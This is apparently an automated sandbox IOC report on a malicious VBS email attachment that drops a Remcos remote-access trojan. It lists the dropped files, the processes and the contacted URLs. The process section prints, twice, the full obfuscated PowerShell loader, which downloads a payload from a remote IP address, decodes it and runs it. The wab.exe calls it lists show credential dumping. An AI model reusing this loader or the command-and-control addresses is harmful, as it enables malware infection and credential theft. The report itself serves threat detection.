IOC Report
STATEMENT OF ACCOUNT.vbs

loading gif

Files

File Path
Type
Category
Malicious
STATEMENT OF ACCOUNT.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asrbhln5.pt5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjp4vb4n.fhi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nggbinth.znm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqjjre0d.eq3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv3B88.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\bhv5123.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Fejdede.ell
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
103.237.87.159
malicious
http://103.237.86.247/Udmagret.hhk
103.237.86.247
http://www.imvu.comr
unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
unknown
http://www.imvu.comta
unknown
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
http://103.237.86.247
unknown
http://103.237.86.247/Udmagret.hhkXR
unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
unknown
https://contoso.com/License
unknown
http://103.237.86
unknown
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
unknown
http://103.237.86.247/U
unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
unknown
http://103.237.86.247/Udma
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gpC
unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
unknown
http://103.237.86.247/Ud
unknown
http://103.237
unknown
http://103.237.
unknown
https://aka.ms/pscore6lB
unknown
https://maps.windows.com/windows-app-web-link
unknown
http://103.237.8
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://103.2
unknown
http://103.237.86.247/Udmag
unknown
http://103.237.86.
unknown
http://103.237.86.247/Udmagr
unknown
http://crl.micro?
unknown
